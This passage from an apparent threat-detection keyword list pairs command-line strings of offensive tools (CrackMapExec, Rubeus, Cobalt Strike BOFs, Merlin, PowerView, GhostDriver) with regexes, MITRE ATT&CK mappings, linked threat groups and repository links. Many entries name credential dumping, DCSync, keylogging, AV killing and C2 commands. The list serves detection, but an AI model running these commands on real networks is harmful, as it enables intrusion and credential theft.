formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1305" "* get site-push-settings*",".{0,1000}\sget\ssite\-push\-settings.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1306" "*-------------- Get System Priv with WebClient --------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sGet\sSystem\sPriv\swith\sWebClient\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","1307" "* get_keystrokes*",".{0,1000}\sget_keystrokes.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1308" "* get_netdomaincontroller*",".{0,1000}\sget_netdomaincontroller.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1309" "* get_netrdpsession*",".{0,1000}\sget_netrdpsession.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1310" "* get_rooot *",".{0,1000}\sget_rooot\s.{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tool","https://github.com/plummm/CVE-2022-27666","1","0","N/A","N/A","N/A","3","204","39","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z","1311" "* get_timedscreenshot*",".{0,1000}\sget_timedscreenshot.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1312" "* Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' *",".{0,1000}\sGet\-ADReplAccount\s\-SamAccountName\s\'AZUREADSSOACC\$\'\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","1313" "* GetAppLockerPolicies*",".{0,1000}\sGetAppLockerPolicies.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","1314" "* --get-backdoor*",".{0,1000}\s\-\-get\-backdoor.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","1316" "* Get-DomainController | select Name,OSversion,IPAddress |fl*",".{0,1000}\sGet\-DomainController\s\|\sselect\sName,OSversion,IPAddress\s\|fl.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","1317" "* Get-DomainGPO -Identity 
""{AB306569-220D-43FF-B03B-83E8F4EF8081}""*",".{0,1000}\sGet\-DomainGPO\s\-Identity\s\""\{AB306569\-220D\-43FF\-B03B\-83E8F4EF8081\}\"".{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","1318" "* Get-GPPPassword.ps1*",".{0,1000}\sGet\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1319" "* Get-InfectedThread.ps1*",".{0,1000}\sGet\-InfectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1320" "* Get-InjectedThread.ps1*",".{0,1000}\sGet\-InjectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1321" "* 
GetLsassPid*",".{0,1000}\sGetLsassPid.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","1322" "* Get-NetNTLM.ps1*",".{0,1000}\sGet\-NetNTLM\.ps1.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/elnerd/Get-NetNTLM","1","0","N/A","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","1323" "* GetNPUsers.py*",".{0,1000}\sGetNPUsers\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1324" "* Get-OSTokenInformation.ps1*",".{0,1000}\sGet\-OSTokenInformation\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1325" "* GetPasswords.ps1*",".{0,1000}\sGetPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","1326" "* getprivs.c *",".{0,1000}\sgetprivs\.c\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - 
T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","1327" "* getprivs.o *",".{0,1000}\sgetprivs\.o\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","1328" "* Get-ScheduledTaskComHandler.ps1*",".{0,1000}\sGet\-ScheduledTaskComHandler\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1329" "* Get-ServiceFromRegistry -Name Spooler*",".{0,1000}\sGet\-ServiceFromRegistry\s\-Name\sSpooler.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","1330" "* Get-SMBSigning.ps1*",".{0,1000}\sGet\-SMBSigning\.ps1.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB 
signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","1331" "* Get-SpoolStatus.ps1*",".{0,1000}\sGet\-SpoolStatus\.ps1.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","1332" "* --get-syscallstub *",".{0,1000}\s\-\-get\-syscallstub\s.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","1333" "* Get-TGSCipher.ps1*",".{0,1000}\sGet\-TGSCipher\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1334" "* Ghauri is going to use the current database to enumerate table(s) entries*",".{0,1000}\sGhauri\sis\sgoing\sto\suse\sthe\scurrent\sdatabase\sto\senumerate\stable\(s\)\sentries.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability 
Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","1335" "* GhostDriver.exe*",".{0,1000}\sGhostDriver\.exe.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","1336" "* ghostdriver.sys*",".{0,1000}\sghostdriver\.sys.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","1337" "* GhostTask.c *",".{0,1000}\sGhostTask\.c\s.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","1338" "* -GHUser * -GHRepo *",".{0,1000}\s\-GHUser\s.{0,1000}\s\-GHRepo\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-ExfilDataToGitHub.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1339" "* giop-info.nse*",".{0,1000}\sgiop\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1341" "* github repos list --org*",".{0,1000}\sgithub\srepos\slist\s\-\-org.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","1342" "* github repos list --user *",".{0,1000}\sgithub\srepos\slist\s\-\-user\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","1343" "* give-dcsync*",".{0,1000}\sgive\-dcsync.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","1344" "* give-genericall * -target-sid *",".{0,1000}\sgive\-genericall\s.{0,1000}\s\-target\-sid\s.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","1345" "* gkrellm-info.nse*",".{0,1000}\sgkrellm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1346" "* GlllPowerLoader.py*",".{0,1000}\sGlllPowerLoader\.py.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","1347" "* gmailC2.exe*",".{0,1000}\sgmailC2\.exe.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","1348" "* --gmsa-decrypt-lsa *",".{0,1000}\s\-\-gmsa\-decrypt\-lsa\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - 
T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1349" "* go build -o padre .*",".{0,1000}\sgo\sbuild\s\-o\spadre\s\..{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","0","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","1350" "* golden * /badpwdcount*",".{0,1000}\sgolden\s.{0,1000}\s\/badpwdcount.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1351" "* golden * /ldap *",".{0,1000}\sgolden\s.{0,1000}\s\/ldap\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license).
